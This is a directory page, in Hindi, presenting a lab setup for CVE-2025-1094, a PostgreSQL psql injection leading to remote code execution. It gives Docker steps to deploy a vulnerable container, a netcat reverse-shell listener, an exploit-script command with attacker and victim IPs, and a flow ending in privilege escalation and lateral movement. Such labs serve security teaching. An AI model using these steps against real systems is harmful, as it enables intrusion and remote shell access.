Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1094-Lab-Setup — # CVE-2025-1094 का शोषण करने के लिए व्यावहारिक प्रयोगशाला, PostgreSQL psql SQL इंजेक्शन जो COPY TO PROGRAM के माध्यम से RCE की ओर ले जाता है, Docker सेटअप और रिवर्स शेल पेलोड के साथ। | Kitploit
उपकरण/GitHubGitHub/pinkarmor/cve-2025-1094-lab-setup
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubpinkarmor/cve-2025-1094-lab-setup

CVE-2025-1094-Lab-Setup

# CVE-2025-1094 का शोषण करने के लिए व्यावहारिक प्रयोगशाला, PostgreSQL psql SQL इंजेक्शन जो COPY TO PROGRAM के माध्यम से RCE की ओर ले जाता है, Docker सेटअप और रिवर्स शेल पेलोड के साथ।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛠️ CVE-2025-1094 लैब सेटअप

⚠️ अस्वीकरण
यह लैब केवल शैक्षिक और शोध उद्देश्यों के लिए है।
यहां प्रदर्शित किसी भी जानकारी या तकनीक का उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। इन विधियों का अनधिकृत उपयोग कानून का उल्लंघन कर सकता है और गंभीर दंड का कारण बन सकता है।


📌 अवलोकन

CVE-2025-1094 एक गंभीर कमजोरी है जो PostgreSQL के इंटरैक्टिव टूल psql को प्रभावित करती है, जो संस्करण 14.15 और उससे पहले के संस्करणों में पाई गई है।
यह हमलावरों को SQL इंजेक्शन करने की अनुमति देती है जो कुछ शर्तों के तहत रिमोट कोड एक्ज़ीक्यूशन (RCE) का कारण बन सकती है।


🧨 मूल कारण

यह कमजोरी psql में दोषपूर्ण UTF-8 इनपुट के अनुचित हैंडलिंग से उत्पन्न होती है।
अपर्याप्त सत्यापन के कारण, हमलावर मनमाने SQL या मेटा-कमांड जैसे ! (शेल एस्केप) इंजेक्ट कर सकते हैं, और यहां तक कि सिस्टम कमांड चलाने के लिए COPY ... TO PROGRAM का दुरुपयोग भी कर सकते हैं।


🔥 प्रभाव और हमले के परिदृश्य

  • SQL इंजेक्शन → RCE: दोषपूर्ण UTF-8 स्ट्रिंग्स सत्यापन को बायपास करती हैं और मनमाने क्वेरी निष्पादन की ओर ले जाती हैं।
  • COPY TO PROGRAM का दुरुपयोग: हमलावर मनमाने शेल कमांड निष्पादित कर सकते हैं जैसे:
    • रिवर्स शेल
    • संवेदनशील फ़ाइलें पढ़ना (/etc/passwd)
    • पूर्ण अनप्रमाणित RCE के लिए अन्य CVEs के साथ संयोजन
  • एकीकरण जोखिम: ऐसे सॉफ़्टवेयर जो अविश्वसनीय इनपुट के साथ psql का उपयोग करते हैं (जैसे, BeyondTrust PRA, Remote Support) विशेष रूप से जोखिम में हैं।

🧪 लैब आवश्यकताएँ

🐳 पीड़ित (Ubuntu)

Docker स्थापित करें:

root@kitploit:~
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER

👉 Docker समूह अनुमतियाँ लागू करने के लिए रीबूट करें या लॉग आउट और फिर से लॉग इन करें।


🐍 हमलावर (Kali)

Python और निर्भरताएँ स्थापित करें:

root@kitploit:~
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional

✅ हमलावर और पीड़ित मशीनों के बीच नेटवर्क कनेक्टिविटी सुनिश्चित करें।


⚙️ चरण 1 – कमजोर PostgreSQL कंटेनर तैनात करें (पीड़ित)

  1. PostgreSQL 14.15 इमेज खींचें:
root@kitploit:~
docker pull postgres:14.15
  1. कंटेनर चलाएँ:
root@kitploit:~
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
  1. आरंभीकरण के लिए ~5 सेकंड प्रतीक्षा करें, फिर एक डेमो टेबल बनाएँ:
root@kitploit:~
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF

✅ चरण 1.5 – कंटेनर और डेटाबेस सेटअप सत्यापित करें

कंटेनर शुरू करने के बाद, निम्नलिखित कमांड से सब कुछ ठीक से काम कर रहा है यह सत्यापित करें:

1. जाँचें कि PostgreSQL कंटेनर चल रहा है:

root@kitploit:~
sudo docker ps

📌 आपको पोर्ट 5432 पर सुन रहा vulnerable_postgres नामक कंटेनर दिखना चाहिए।


2. कंटेनर तक पहुँचें और डेटाबेस का निरीक्षण करें:

root@kitploit:~
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb

psql शेल के अंदर, चलाएँ:

root@kitploit:~
SELECT * FROM users;

अपेक्षित आउटपुट:

root@kitploit:~
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)

psql से बाहर निकलें:

root@kitploit:~
\q

✅ अब आपका कमजोर PostgreSQL इंस्टेंस चल रहा है और शोषण के लिए तैयार है।


3. कंटेनर को वापस चालू करें

root@kitploit:~
sudo docker start vulnerable_postgres

📡 चरण 2 – हमलावर मशीन से शोषण

  1. रिवर्स शेल पकड़ने के लिए हमलावर मशीन पर एक लिसनर शुरू करें:
root@kitploit:~
nc -lvnp 4444
  1. शोषण स्क्रिप्ट चलाएँ (आवश्यकता अनुसार IP और पोर्ट समायोजित करें):
root@kitploit:~
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
  1. सफल होने पर, आपको कमजोर PostgreSQL कंटेनर से एक रिवर्स शेल प्राप्त होगा 🎉
root@kitploit:~
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.

🧰 शोषण प्रवाह का उदाहरण

  1. इनपुट सत्यापन को बायपास करने के लिए दोषपूर्ण UTF-8 इंजेक्ट करें
  2. मनमाने शेल कमांड निष्पादित करने के लिए COPY ... TO PROGRAM का शोषण करें
  3. रिवर्स शेल हमलावर मशीन से वापस जुड़ता है
  4. विशेषाधिकार बढ़ाएँ या वातावरण के अंदर पार्श्व रूप से आगे बढ़ें

💡 टिप: आप इस कमजोर कंटेनर का स्नैपशॉट ले सकते हैं और वातावरण को दोबारा बनाए बिना इसे बाद में पुनः उपयोग कर सकते हैं।

टूल डाउनलोड करें